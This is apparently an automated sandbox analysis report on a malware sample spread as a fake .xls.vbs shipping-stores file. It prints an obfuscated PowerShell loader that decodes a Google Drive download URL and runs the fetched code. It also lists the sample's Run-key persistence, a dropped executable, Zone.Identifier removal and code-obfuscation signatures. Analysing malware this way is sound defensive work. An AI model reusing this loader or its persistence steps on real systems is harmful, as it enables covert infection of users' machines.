lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior

Binary contains a suspicious time stamp

Source: FTSKIaM.exe.11.dr

Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]

PE file contains sections with non-standard names

Source: FTSKIaM.exe.11.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B2900BD pushad ; iretd	3_2_00007FFB4B2900C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5BABC push ds; ret	9_2_00A5BABE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_070708C2 push eax; mov dword ptr [esp], ecx	9_2_07070AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07070AB8 push eax; mov dword ptr [esp], ecx	9_2_07070AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F0CB5 push edi; ret	11_2_022F0CC2
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A1376D push ecx; ret	17_2_00A13780
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A113F8 pushfd ; retf	17_2_00A113F9

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FTSKIaM			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: xls.vbs

Static PE information: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
